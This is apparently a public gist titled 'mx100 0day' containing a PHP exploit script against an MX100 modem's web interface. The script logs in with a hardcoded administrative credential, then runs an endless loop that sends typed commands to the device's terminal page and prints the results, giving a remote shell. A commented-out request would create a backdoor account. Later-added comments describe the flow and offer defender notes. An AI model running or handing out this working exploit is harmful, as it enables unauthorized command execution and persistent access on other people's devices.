@numanturle
Last active September 28, 2021 07:32
mx100 0day
<?php
/**
 * Print a string one byte at a time, pausing after every byte.
 *
 * @param string $msg  Text to print. It is split with str_split(), i.e. byte-wise,
 *                     so a multi-byte character is emitted over several steps.
 * @param int    $time Pause after each byte in microseconds (handed to usleep()).
 * @return void Nothing is returned; the text goes straight to standard output.
 */
function anim($msg, $time)
{
    $bytes = str_split($msg);
    $count = count($bytes);
    for ($i = 0; $i < $count; $i++) {
        print $bytes[$i];
        usleep($time);
    }
}
// Banner: prints the ASCII-art title through anim(), one byte at a time with a
// 900 microsecond pause per byte. Cosmetic only; no network activity happens here.
anim("
___ _
/ _ \ | |
| | | | __| | __ _ _ _
| | | |/ _` |/ _` | | | |
| |_| | (_| | (_| | |_| |
\___/ \__,_|\__,_|\__, |
__/ |
__ __ ____ ____|___/____ _ __ ____ ____ ___ ___
| \/ |/ __ \| __ \| ____| | | \/ \ \ / /_ |/ _ \ / _ \
| \ / | | | | | | | |__ | | | \ / |\ V / | | | | | | | |
| |\/| | | | | | | | __| | | | |\/| | > < | | | | | | | |
| | | | |__| | |__| | |____| |____ | | | |/ . \ | | |_| | |_| |
|_| |_|\____/|_____/|______|______| |_| |_/_/ \_\|_|\___/ \___/
", 900);
echo PHP_EOL;
// anim() echoes the prompt itself and has no return statement, so the outer
// echo receives null and adds nothing to the output.
echo anim("Target : ", 800);
// $hedef ("target") is one line read from STDIN, trimmed. The rest of the script
// uses it unvalidated as the base URL of every request, so this value alone
// decides which host the requests are sent to.
$hedef = trim(fgets(STDIN));
echo PHP_EOL;
// Disabled by the author ("create backdoor"): the commented-out request below
// targets the add-user endpoint under /modules/users/. It is never executed and
// refers to $argv[1] and $uret, neither of which this script defines.
// Defender note: requests to data_users.php with job=add_user are worth alerting
// on in the device's web logs, as are unexpected accounts with profile "all".
#$baglan = file_get_contents($argv[1] . "/modules/users/data_users.php?job=add_user&custom_username={$uret}&custom_password={$uret}&custom_password_confirm={$uret}&custom_profile=all&custom_mlogin=&custom_status=enabled");
// Request 1: POST a fixed username/password pair to the target URL exactly as
// typed (no path is appended here).
// NOTE(review): the page does not say whether this pair is a factory default or
// a built-in account — confirm against the vendor documentation. Either way the
// finding is a guessable/fixed administrative credential: it must be changed or
// disabled, and logins with it from unexpected sources should be alerted on.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, trim($hedef));
curl_setopt($ch, CURLOPT_POST, 1);
// Session cookies are kept in "cookie.dat", a relative path, i.e. a file in the
// current working directory; the later requests read the same file.
curl_setopt($ch, CURLOPT_COOKIESESSION, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");
curl_setopt($ch, CURLOPT_POSTFIELDS,
"username=admin&password=moiwi&submit=");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The response is stored but never inspected: the script checks neither whether
// the login succeeded nor whether curl_exec() returned false.
$server_output = curl_exec($ch);
curl_close($ch);
// Request 2: GET <target>/index.php with the same cookie jar. The response is
// again discarded; presumably this only confirms or refreshes the session —
// TODO confirm against the device's behaviour.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, trim($hedef) . "/index.php");
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$server_output = curl_exec($ch);
curl_close($ch);
// Interactive loop with no exit condition: each pass reads one line from STDIN
// and submits it as the "command" form field to <target>/tools/terminal.php,
// reusing the session cookie stored in cookie.dat.
// NOTE(review): the endpoint name and the way the reply is parsed suggest the
// device's web UI ships a terminal page available to a logged-in session —
// confirm on the product. If so, the exposure is that page combined with a
// guessable administrative login, not a memory-safety bug.
// Defender notes: in web-server logs this shows up as a login POST followed by
// repeated POSTs to /tools/terminal.php carrying a "command" parameter. Keeping
// the management interface off untrusted networks, changing or disabling the
// built-in credential, and disabling or access-controlling the terminal page
// each break this sequence.
while (1) {
// anim() returns nothing, so the outer echo prints only what anim() already wrote.
echo anim("Command : ", 800);
// $komut ("command"): the operator's input line, trimmed.
$komut = trim(fgets(STDIN));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, trim($hedef) . "/tools/terminal.php");
curl_setopt($ch, CURLOPT_POST, 1);
// Redirects are followed for this request (the two earlier requests do not set this).
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.dat");
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.dat");
// The input is URL-encoded before being placed in the form body;
// persist_command_id is sent empty.
curl_setopt($ch, CURLOPT_POSTFIELDS,
"persist_command_id=&command=" . urlencode(trim($komut)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The return value is not checked; on a transport error curl_exec() yields false.
$server_output = curl_exec($ch);
curl_close($ch);
// Collect every <pre>...</pre> block (case-insensitive, '.' also matches
// newlines) and print only the last one. $ciktilar means "outputs". When
// nothing matches, end() returns false and echo prints an empty string.
preg_match_all('@<pre>(.*?)</pre>@si', $server_output, $ciktilar);
echo end($ciktilar[1]);
}